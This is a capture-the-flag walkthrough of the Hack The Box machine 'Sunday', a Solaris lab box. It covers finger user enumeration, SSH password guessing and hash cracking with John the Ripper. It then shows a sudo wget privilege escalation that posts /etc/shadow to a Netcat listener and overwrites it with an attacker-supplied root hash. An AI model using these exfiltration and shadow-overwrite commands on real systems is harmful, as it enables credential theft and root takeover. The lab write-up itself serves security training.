I started the machine by running NMap against it:
┌──(root💀kali)-[/home/kali/Documents/sunday] └─# nmap -p- -sV -sC -O -oN scan 10.10.10.76 --min-rate 1000 --max-retries 5 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 08:30 EST Warning: 10.10.10.76 giving up on port because retransmission cap hit (5). Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 22.64% done; ETC: 08:36 (0:04:16 remaining) Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 57.03% done; ETC: 08:36 (0:02:22 remaining) Stats: 0:04:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 80.79% done; ETC: 08:36 (0:01:03 remaining) Stats: 0:07:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.85% done; ETC: 08:37 (0:00:00 remaining) Nmap scan report for sunday.htb (10.10.10.76) Host is up (0.025s latency). Not shown: 51557 filtered ports, 13973 closed ports PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd |_finger: ERROR: Script execution failed (use -d to debug) 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) 40880/tcp open unknown 44671/tcp open unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/14%OT=79%CT=7%CU=34844%PV=Y%DS=2%DC=I%G=Y%TM=602927B OS:D%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=94%GCD=1%ISR=A1%TI=I%CI=I%II=I%S OS:S=S%TS=7)SEQ(SP=97%GCD=1%ISR=A4%TI=I%CI=I%TS=7)OPS(O1=NNT11M54DNW0NNS%O2 OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S) Network Distance: 2 hops Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 442.61 seconds
We can see that RCPBind, Finger and SSH are running, as well as 2 unknown services on 40880 and 44671. I started by running the finger command against the machine:
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Usernames] └─# finger @10.10.10.76 Login Name TTY Idle When Where sunny sunny pts/2 Sun 18:03 10.10.16.148
the username sunny was found. I attempted to login to the Sunday machine via SSH with the username sunny. After a few guesses I discovered that the password Sunday allowed me to login:
┌──(root💀kali)-[/home/kali/Documents/sunday/finger-user-enum-1.0] └─# ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1 1 ⨯ Password: Last login: Sun Feb 14 18:03:48 2021 from 10.10.16.148 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sunny@sunday:~$ pwd /export/home/sunny
Once logged in I did some exploring around the machine and found there was a backup folder in the / directory. This contained the file shadow.backup which included 2 password hashes from the shadow file:
sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636:::::: sunny@sunday:/backup$
I copied these hashes into a file on the kali machine called pass.txt. then ran John against it used the rockyou wordlist.
┌──(root💀kali)-[/home/kali/Documents/sunday] └─# john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x]) Remaining 1 password hash Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:10 0.66% (ETA: 16:12:53) 0g/s 10928p/s 10928c/s 10928C/s munster1..chambers1 0g 0:00:00:14 0.93% (ETA: 16:12:46) 0g/s 10976p/s 10976c/s 10976C/s shelbourne..marinell cooldude! (sammy) 1g 0:00:00:18 DONE (2021-02-15 15:47) 0.05350g/s 10957p/s 10957c/s 10957C/s dompet..bluepen Use the "--show" option to display all of the cracked passwords reliably Session completed
From the output, we can see that the password cooldude! was found for the username sammy. I then tried logging into the machine via SSH with the sammy user and the password cooldude!. This was successful and I was able to capture the user flag.
┌──(root💀kali)-[/home/kali/Documents/sunday] └─# ssh sammy@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1 Password: Last login: Fri Jul 31 17:59:59 2020 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sammy@sunday:~$ ls Desktop Documents Downloads Public sammy@sunday:~$ cd Desktop sammy@sunday:~/Desktop$ cat user.txt [REDACTED]
I next needed to escalate privileges to root. I ran the command sudo -l to identify if there were any files that could be executed as root without needing to provide a password:
sammy@sunday:/etc$ sudo -l User sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget
We can see that the get command can be run as root without a password. I created a new shadow file on my kali machine containing a new root hash of my choosing:
I started by generating the new hash:
┌──(root💀kali)-[~/.ssh] └─# openssl passwd -5 -salt thesalt pass123 1 ⚙ $5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3
I then took a copy of the shadow file currently used on the Sunday machine. I did this using wget running as root, by first creating a Netcat listener on kali:
┌──(root💀kali)-[/home/kali/Documents/sunday] └─# nc -nvlp 80 2 ⚙ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80
Then posting the file from the Sunday machine to my kali listener using sudo wget:
sammy@sunday:/tmp$ sudo wget --post-file=/etc/shadow 10.10.14.15 --02:00:03-- http://10.10.14.15/ => `index.html' Connecting to 10.10.14.15:80... connected. HTTP request sent, awaiting response...
The listener then captured this shadow file response.
┌──(root💀kali)-[/home/kali/Documents/sunday] └─# nc -nvlp 80 2 ⚙ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from 10.10.10.76. Ncat: Connection from 10.10.10.76:40985. POST / HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.10.14.15 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 628 root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: dladm:*LK*::::::: smmsp:NP:6445:::::: listen:*LK*::::::: gdm:*LK*::::::: zfssnap:NP::::::: xvm:*LK*:6445:::::: mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I copied the contents of this shadow file to a file on my kali machine called shadow and modified the root line at the top with the hash I generated with the openssl command. So my root entry looked like the following:
root:$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3:::::::
This shadow file was then hosted via python HTTP server and downloaded back onto the Sunday machine, overwriting the original shadow file:
sammy@sunday:/etc$ sudo wget http://10.10.14.15:8000/shadow -O /etc/shadow --01:59:50-- http://10.10.14.15:8000/shadow => `/etc/shadow' Connecting to 10.10.14.15:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 628 [application/octet-stream] 100%[====================================================================================================>] 628 --.--K/s 01:59:50 (796.26 KB/s) - `/etc/shadow' saved [628/628]
Once downloaded I then attempted to switch user to root using the password I entered when creating the new hash (pass123)
sammy@sunday:/tmp$ su root Password: sammy@sunday:/tmp# whoami root sammy@sunday:/tmp# cd /root sammy@sunday:/root# ls overwrite root.txt troll troll.original sammy@sunday:/root# cat root.txt [REDACTED]
As you can see from the output, this was successful and I was able to capture the root flag.